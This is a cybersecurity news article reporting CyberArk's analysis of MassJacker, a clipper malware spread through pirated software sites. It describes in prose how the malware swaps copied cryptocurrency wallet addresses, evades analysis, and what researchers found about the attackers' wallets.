Monday, March 17, 2025
Homecyber securityMassJacker Clipper Malware Targets Users Installing Pirated Software

MassJacker Clipper Malware Targets Users Installing Pirated Software

Published on

SIEM as a Service

Follow Us on Google News

A recent investigation has uncovered previously unknown cryptojacking malware, dubbed MassJacker, which primarily targets users who download pirated software from sites like pesktop.com.

This malware operates by replacing cryptocurrency wallet addresses copied by users with those belonging to the attackers, aiming to redirect funds to the threat actors’ wallets.

The discovery highlights the risks associated with using unauthorized software sources and the evolving nature of cryptojacking threats.

MassJacker Clipper
Infection Chain Diagram

Infection Chain and Techniques

The MassJacker infection chain begins with the execution of a cmd script followed by a PowerShell script, which downloads additional executables.

One of these executables is identified as Amadey, a well-known botnet, while the others are dotnet executables compiled for different architectures.

The malware employs sophisticated anti-analysis techniques, including JIT Hooking and metadata token mapping, to evade detection.

These techniques are reminiscent of those used by another malware, MassLogger, suggesting a possible connection between the two threats.

The malware uses a custom virtual machine to further obfuscate its operations, executing scripts that manage control flow and deobfuscate additional resources.

Once fully loaded, MassJacker injects its payload into a process called InstalUtil.exe, where it implements cryptojacking functionality.

MassJacker Clipper
The MassJacker Configuration

According to CyberArk, this includes replacing copied cryptocurrency addresses with attacker-controlled ones and downloading encrypted lists of wallets from Command and Control (C2) servers.

Impact and Analysis

The investigation revealed that MassJacker has been associated with over 750,000 unique wallet addresses, with one wallet holding over $300,000.

However, most wallets were found to be empty, and the total amount of money in active wallets was significantly lower.

The researchers suspect that much of the money in these wallets may not have originated from cryptojacking activities but from other malicious operations.

The use of a consistent encryption scheme allowed researchers to decrypt older files and uncover additional addresses, highlighting the malware’s extensive reach.

The discovery of MassJacker underscores the importance of avoiding pirated software and the need for robust security measures to protect against evolving cyber threats.

As cryptocurrencies continue to attract attention, malware like MassJacker will likely remain a significant concern for users and security professionals alike.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

Hackers Rapidly Adopt ClickFix Technique for Sophisticated Attacks

In recent months, a sophisticated social engineering technique known as ClickFix has gained significant...

Supply Chain Attack Targets 23,000 GitHub Repositories

A critical security incident has been uncovered involving the popular GitHub Action tj-actions/changed-files, which...

Beware! Malware Hidden in Free Word-to-PDF Converters

The FBI has issued a warning about a growing threat involving free file conversion...

SocGholish Exploits Compromised Websites to Deliver RansomHub Ransomware

SocGholish, a sophisticated malware-as-a-service (MaaS) framework, has been identified as a key enabler in...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Hackers Rapidly Adopt ClickFix Technique for Sophisticated Attacks

In recent months, a sophisticated social engineering technique known as ClickFix has gained significant...

Supply Chain Attack Targets 23,000 GitHub Repositories

A critical security incident has been uncovered involving the popular GitHub Action tj-actions/changed-files, which...

Beware! Malware Hidden in Free Word-to-PDF Converters

The FBI has issued a warning about a growing threat involving free file conversion...